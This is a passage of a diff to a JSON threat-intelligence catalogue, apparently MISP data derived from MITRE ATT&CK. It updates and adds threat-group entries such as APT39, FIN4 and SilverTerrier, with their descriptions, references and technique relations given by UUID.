@@ -8663,28 +10164,28 @@ "type": "uses" }, { - "dest-uuid": "60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "53d47b09-09c2-4015-8d37-6633ecd53f79", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "53a42597-1974-4b8e-84fd-3675e8992053", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8697,24 +10198,137 @@ ], "type": "uses" }, + { + "dest-uuid": "a2282af0-f9dd-4373-9b92-eaf9e11e0c71", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "414dc555-c79e-4b24-a2da-9b607f7eaf16", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "49abab73-3c5c-476e-afd5-69b5c732d845", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4189a679-72ed-4a89-a57c-7f689712ecf8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + 
}, + { + "dest-uuid": "0852567d-7958-4f4b-8947-4f840ec8d57d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "211cfe9f-2676-4e1c-a5f5-2c8091da2a68", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4a2ce82e-1a74-468a-a6fb-bbead541383c", "value": "APT37 - G0067" }, { - "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors. (Citation: FireEye FIN6 April 2016)", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", "meta": { "external_id": "G0037", "refs": [ "https://attack.mitre.org/groups/G0037", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" ], "synonyms": [ "FIN6" 
@@ -8736,7 +10350,7 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8750,28 +10364,7 @@ "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8785,42 +10378,7 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8840,6 +10398,34 @@ ], "type": "uses" }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ 
@@ -8847,6 +10433,34 @@ ], "type": "uses" }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -8855,7 +10469,49 @@ "type": "uses" }, { - "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5af7a825-2d9f-400d-931a-e00eb9e27f48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8922,6 +10578,239 @@ "uuid": "da49b9f1-ca99-443f-9728-0a074db66850", "value": "BlackOasis - G0063" }, + { + "description": "[APT39](https://attack.mitre.org/groups/G0087) is an Iranian cyber espionage group that has been active since at least 2014. They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran's national priorities. (Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)", + "meta": { + "external_id": "G0087", + "refs": [ + "https://attack.mitre.org/groups/G0087", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" + ], + "synonyms": [ + "APT39", + "Chafer" + ] + }, + "related": [ + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + 
"dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ecc2f65a-b452-4eaf-9689-7e181f17f7a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "44e43fad-ffcb-4210-abcf-eaaed9735f80", + "value": "APT39 - G0087" + }, + { + "description": "[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)", + "meta": { + "external_id": "G0083", + "refs": [ + "https://attack.mitre.org/groups/G0083", + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf" + ], + "synonyms": [ + "SilverTerrier" + ] + }, + "related": [ + { + "dest-uuid": "2a70812b-f1ef-44db-8578-a496a227aef2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "53ab35c2-d00e-491a-8753-41d35ae7e547", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e7a5229f-05eb-440e-b982-9a6d2b2b87c8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "76565741-3452-4069-ab08-80c0ea95bbeb", + "value": "SilverTerrier - G0083" + }, { "description": "[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)", "meta": { @@ -8957,13 +10846,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9e9b9415-a7df-406b-b14d-92bfe6809fbe", "tags": [ 
@@ -8971,26 +10853,129 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5cbe0d3b-6fb1-471f-b591-4b192915116d", "value": "Suckfly - G0039" }, { - "description": "[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university. 
(Citation: Palo Alto menuPass Feb 2017) (Citation: Crowdstrike CrowdCast Oct 2013) (Citation: FireEye Poison Ivy) (Citation: PWC Cloud Hopper April 2017) (Citation: FireEye APT10 April 2017)", + "description": "[FIN4](https://attack.mitre.org/groups/G0085) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye FIN4 Stealing Insider NOV 2014) [FIN4](https://attack.mitre.org/groups/G0085) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)", + "meta": { + "external_id": "G0085", + "refs": [ + "https://attack.mitre.org/groups/G0085", + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html" + ], + "synonyms": [ + "FIN4" + ] + }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "d0b3393b-3bec-4ba3-bda9-199d30db47b6", + "value": "FIN4 - G0085" + }, + { + "description": "[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university. (Citation: Palo Alto menuPass Feb 2017) (Citation: Crowdstrike CrowdCast Oct 2013) (Citation: FireEye Poison Ivy) (Citation: PWC Cloud Hopper April 2017) (Citation: FireEye APT10 April 2017) (Citation: DOJ APT10 Dec 2018)", "meta": { "external_id": "G0045", "refs": [ 
@@ -9000,6 +10985,7 @@ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + "https://www.justice.gov/opa/press-release/file/1121706/download", "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf" ], "synonyms": [ 
@@ -9034,63 +11020,7 @@ "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9103,6 +11033,13 @@ ], "type": "uses" }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", "tags": [ 
@@ -9111,63 +11048,14 @@ "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9181,42 +11069,14 @@ "type": "uses" }, { - "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "2f1a9fd0-3b7c-4d77-a358-78db13adbe78", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bba595da-b73a-4354-aa6c-224d4de7cb4e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9230,42 +11090,7 @@ "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "17b40f60-729f-4fe8-8aea-cc9ee44a95d5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3240cbe4-c550-443b-aa76-cc2a7058b870", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9279,14 +11104,126 @@ "type": "uses" }, { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" 